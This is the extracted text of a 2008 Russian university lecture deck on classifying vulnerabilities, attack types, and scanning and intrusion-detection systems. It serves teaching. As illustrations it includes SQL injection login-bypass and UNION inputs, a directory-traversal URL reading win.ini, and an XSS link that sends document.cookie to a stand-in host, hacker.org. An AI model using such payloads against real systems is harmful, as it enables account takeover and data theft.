Уязвимость

реклама
Технологии и продукты
Microsoft в обеспечении ИБ
Лекция 16. Анализ защищённости информационной системы на
основе выявления уязвимостей и обнаружения вторжений
Цели
 Изучить классификацию уязвимостей,




информационных атак и их возможных последствий.
Рассмотреть различные типы технологических и
эксплуатационных уязвимостей программноаппаратного обеспечения АС.
Изучить основные способы реализации
информационных атак.
Научиться отличать сетевые и хостовые системы
анализа защищённости.
Познакомиться с методами сбора и анализа
информации, реализуемые в системах анализа
защищённости.
2
Высшая школа экономики - 2008
Уязвимость - «ахиллесова пята»
информационных систем
3
Высшая школа экономики - 2008
От чего защищать?
4
Высшая школа экономики - 2008
Типы уязвимостей
 Технологические уязвимости



Уязвимость типа «переполнение буфера»
Уязвимость типа «SQL Injection»
Уязвимость типа «format string»
 Эксплуатационные уязвимости



Неправильная настройка сетевых сервисов АС
Использование слабых и нестойких к угадыванию
паролей доступа
Отсутствие установленных модулей обновления
программного обеспечения (Service Packs,
HotFixes, и т.д.)
5
Высшая школа экономики - 2008
Классификация уязвимостей АС
Уязвимости автоматизированных систем
По типу уязвим ости
Уязвимос ть в программноаппаратном обе спечении АС
Уязвимос ть в организационноправовом обеспечении АС
По типу обеспечения АС, в котором содержится уязв имость
Уязвимость апп аратного
обеспечения
Уязвимость общесистемного
программного обеспечения
Уязвимость прикладного
п рограммного обеспечения
По типу компонента АС, в котором содержатся уязвимость
Уязвимость рабочи х
станций АС
Уязви мость
с ерверов АС
Уязвимос ть коммун икационн ого
оборудования и каналов связи АС
По этапу ж изненного цикла АС, на котором внедряется уязвимость
Уяз вимость
эксплуатацион ного этапа
Уяз вимость
техн ологического этапа
По степени преднамеренности внесённой уязвимости АС
Уязви мости, вн есённ ые
н епреднамеренным п утём
Уязвимости, внесённые
преднамеренн ым п утём
По уровню модели сетевого взаимодействия, на котором присутствует уязвимость
Уяз вимость
фи зического уровня
Уязви мость
канального уровня
6
Уяз вимость
сетевого уровня
Уязвимость транспортного уровня
Уязви мость прикладного уровня
Высшая школа экономики - 2008
Технологическая уязвимость типа
«переполнение буфера»
7
Высшая школа экономики - 2008
Источники уязвимостей типа
«buffer overflow»
 программы, которые запускаются локально
на хосте
 сетевые приложения, которые
обеспечивают интерактивное
взаимодействие с пользователем на основе
сетевых протоколов. Примером сетевых
программ являются Web-приложения, такие
как CGI-модули, PHP-сценарии, активные
серверные страницы ASP и др.
 хранимые процедуры серверов СУБД
8
Высшая школа экономики - 2008
Технологическая уязвимость
«SQL Injection»
 Уязвимости типа «SQL Injection» («инъекция в
SQL-запросы») позволяют нарушителю
выполнять несанкционированные операции
над содержимым баз данных SQL-серверов
путём вставки дополнительных команд в SQLзапросы
 Уязвимость «SQL Injection» заключается в
отсутствии проверки корректности данных,
поступающих на вход программе, что
потенциально может позволить нарушителю
составить входные данные таким образом, что
приведёт к искажению искомого SQL-запроса к
СУБД
9
Высшая школа экономики - 2008
Активизация уязвимости «SQL
Injection» с целью получения НСД
SQLQuery = "SELECT Username FROM Users WHERE Username = '" &
strUsername & "' AND Password = '" & strPassword & "'"
strAuthCheck = GetQueryResult(SQLQuery)
If strAuthCheck = "" Then
boolAuthenticated = False
Else
boolAuthenticated = True
End If
«SELECT Username FROM Users WHERE Username = ''
OR ''='' AND Password = '' OR ''=''»
(полужирным шрифтом выделены команды, которые
внедряются нарушителем в исходный SQL-запрос).
10
Высшая школа экономики - 2008
Активизация уязвимости «SQL
Injection» с целью извлечения данных
SQLString = "SELECT FirstName, LastName
FROM Employees WHERE City = '" & strCity
& "'«
SELECT FirstName, LastName FROM Employees
WHERE City =
'' UNION ALL SELECT OtherField FROM
OtherTable WHERE ''=''
11
Высшая школа экономики - 2008
Технологическая уязвимость
«Directory traversal»
Уязвимости типа «Directory traversal»
(«просмотр директорий») могут позволить
злоумышленнику получить
несанкционированный доступ к файловым
ресурсам сервера в обход установленных
правил разграничения доступа
«http://192.168.0.1/getnews.asp?item=
../../../../WINNT/win.ini»
12
Высшая школа экономики - 2008
Технологическая уязвимость
«Cross Site Scripting»
Уязвимости типа «Cross Site Scripting»
(«межсайтовое выполнение сценариев»)
характерны для серверных Webприложений, не предусматривающих
проверку синтаксиса входных данных, на
основе которых формируются HTMLдокументы, отправляемые пользователям
«<A HREF="http:// www.server.ru/ShowError.asp?
error_text= <script>document.location.
replace('http://hacker.org/steal.cgi?+document.cookie')
;</script>">Link Text </A>»
13
Высшая школа экономики - 2008
Уязвимости реализаций стека TCP/IP
Уязвимости реализаций стека TCP/IP
связаны с ошибками, которые допускаются
программистами на этапе реализации
программных модулей, отвечающих за
обработку входящих хост
и исходящих пакетов
данных
Пример уязвимости данного типа – атака
«Land»
14
Высшая школа экономики - 2008
Жизненный цикл атаки
15
Высшая школа экономики - 2008
Типы информационных атак
16
Высшая школа экономики - 2008
Инструментальный анализ защищенности
Для чего предназначен:
• Инвентаризация ресурсов сети (устройства, ОС,
службы, ПО)
• Идентификация и анализ технологических уязвимостей
• Подготовка отчетов, описание проблем и методов
устранения
Типы используемых для анализа средств:
• Сетевые сканеры безопасности
• Хостовые сканеры безопасности (проверка ОС и
приложений)
• Утилиты удаленного администрирования
• Утилиты для верификации найденных уязвимостей
• Утилиты для инвентаризации ресурсов
17
Высшая школа экономики - 2008
Сбор информации
 Сетевые датчики предназначены для сбора
информации о пакетах данных,
передаваемых в том сегменте ИС, где
установлен датчик
 Хостовые датчики устанавливаются на
определённые компьютеры в ИС и
предназначаются для сбора информации о
событиях, возникающих на этих компьютерах
18
Высшая школа экономики - 2008
Анализ информации
 Сигнатурные методы описывают каждую
атаку в виде специальной модели или
сигнатуры. В качестве сигнатуры атаки могут
выступать:
 строка символов
 семантическое выражение на специальном языке
 формальная математическая модель и т.д.
 Поведенческие методы отслеживают
несоответствия между текущим режимом
функционирования ИС и моделью штатного
режима работы, заложенной в параметрах
метода
19
Высшая школа экономики - 2008
Microsoft Forefront
 Всесторонняя защита бизнесприложений, позволяющая достичь
лучшей защиты и безопасного доступа
посредством глубокой интеграции и
упрощенного управления
Защита клиентской
и серверной ОС
Защита серверных
приложений
20
Защита периметра
Высшая школа экономики - 2008
Система предотвращения вторжений
 Forefront Network Inspection System (NIS)
 Сигнатуры, основанные на уязвимостях
 Основана на GAPA от Microsoft Research
• Generic Application Level Protocol Analyzer
 Платформа для быстрого низкоуровневого
сканирования
 Расширяема
 Security assessment and response (SAS)
 Моделирование, основанное на поведении
21
Высшая школа экономики - 2008
Система предотвращения вторжений
 Основанная на сигнатурах
 Определяет и противостоит атакам из интернета,
основанным на уязвимостях
 Определяет и предупреждает о «внутренних»
компьютерах, которые ведут атаки
 Основанная на анализе поведения
 «Найди то, не знаю что»
 Отслеживает поведение систем и определяет
потенциально зловредные компоненты сети
 Может противодействовать угрозе на основании
политики
22
Высшая школа экономики - 2008
Использованные источники
 Сердюк В.А. Уязвимость - «Ахиллесова пята»
современных информационных систем
«BYTE/Россия», 2004, №4 (68), стр. 19-22.
 Сердюк В.А. Вы атакованы – защищайтесь
(методология выявления атак) //
«BYTE/Россия», 2003, №9 (61), стр. 61-64
 Сердюк В.А. Новое в защите от взлома
корпоративных систем. Техносфера; 2007.
 Калихман Р. Forefront Client Security: технический
обзор // Microsoft, слайды. Опубликовано:
https://msdb.ru/Downloads/f/d5214ed0-b831-4e27b85c-ad61a700ea45/1_FCS_overview.pdf
23
Высшая школа экономики - 2008
Спасибо за внимание!
Скачать